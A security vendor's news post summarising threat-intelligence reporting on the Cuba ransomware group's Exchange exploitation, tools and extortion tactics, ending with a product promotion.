Cuba Ransomware Hacked Microsoft Exchange Servers
The Ransomware Operation Is Exploiting Microsoft Exchange Vulnerabilities to Gain Initial Access to Corporate Networks.
Cuba Ransomware was launched in 2019, and since then it has not been particularly active in comparison to other operations, like REvil, Avaddon, Conti, and DoppelPaymer.
As BleepingComputer explained, the Mandiant analysts have discovered that the Cuba ransomware operation targets the United States first and then Canada.
In 2021, Mandiant observed some threat actors deploying ransomware increasingly shift to exploiting vulnerabilities as an initial infection vector. UNC2596, a threat actor that deploys COLDDRAW ransomware, publicly known as Cuba Ransomware, exemplifies this trend. While public reporting has highlighted CHANITOR campaigns as precursor for these ransomware incidents, Mandiant has also identified the exploitation of Microsoft Exchange vulnerabilities, including ProxyShell and ProxyLogon, as another access point leveraged by UNC2596 likely as early as August 2021. The content of this blog focuses on UNC2596 activity which has led to the deployment of COLDDRAW ransomware.
UNC2596 is currently the only threat actor tracked by Mandiant that uses COLDDRAW ransomware, which may suggest it’s exclusively used by the group. During intrusions, these threat actors have used webshells to load the TERMITE in-memory dropper with subsequent activity involving multiple backdoors and built-in Windows utilities. Beyond commonplace tools, like Cobalt Strike BEACON and NetSupport, UNC2596 has used novel malware, including BURNTCIGAR to disable endpoint protection, WEDGECUT to enumerate active hosts, and the BUGHATCH custom downloader. In incidents where COLDDRAW was deployed, UNC2596 used a multi-faceted extortion model where data is stolen and leaked on the group’s shaming website, in addition to encryption using COLDDRAW ransomware. COLDDRAW operations have impacted dozens of organizations across more than ten countries, including those within critical infrastructure.
Planting backdoors such as Cobalt Strike or the NetSupport Manager remote access tool is one method used by the group, but they also use their own tools such as “Bughatch,” “Wedgecut,” and “eck.exe,” and “Burntcigar.”
When you run “check.exe,” you’re running a reconnaissance tool that enumerates the Active Directory using PowerShell. Wedgecut is sent in the form of an executable called “check.exe.”
Bughatch is a downloader that fetches PowerShell scripts and files from the C&C server. To evade detection, it loads in memory from a remote URL.
In order to perform a “bring your own vulnerable driver” attack, Burntcigar exploits a hole in an Avast driver, which is bundled with the tool for a “bring your own vulnerable driver” assault.
Finally, there’s Termite, which is a memory-only dropper that gets the payloads listed above and puts them into memory. However, this technology has been identified in operations run by a variety of threat organizations, indicating that it is not solely used by Cuban threat actors.
When the threat actors use stolen account credentials obtained with the widely accessible Mimikatz and Wicker tools, they are able to escalate privileges.
The following deployment is Bughatch, which is loaded by Termite and then followed by Burntcigar, which prepares the ground for data exfiltration and file encryption by deactivating security tools in the target system.
The Cuba ransomware group doesn’t use any cloud services for the exfiltration step but instead sends everything onto their own private infrastructure.
How Can Heimdal™ Help?
In the fight against ransomware, Heimdal™ Security is offering its customers an outstanding integrated cybersecurity suite including the Ransomware Encryption Protection module, that is universally compatible with any antivirus solution, and is 100% signature-free, ensuring superior detection and remediation of any type of ransomware, whether fileless or file-based (including the most recent ones like LockFile).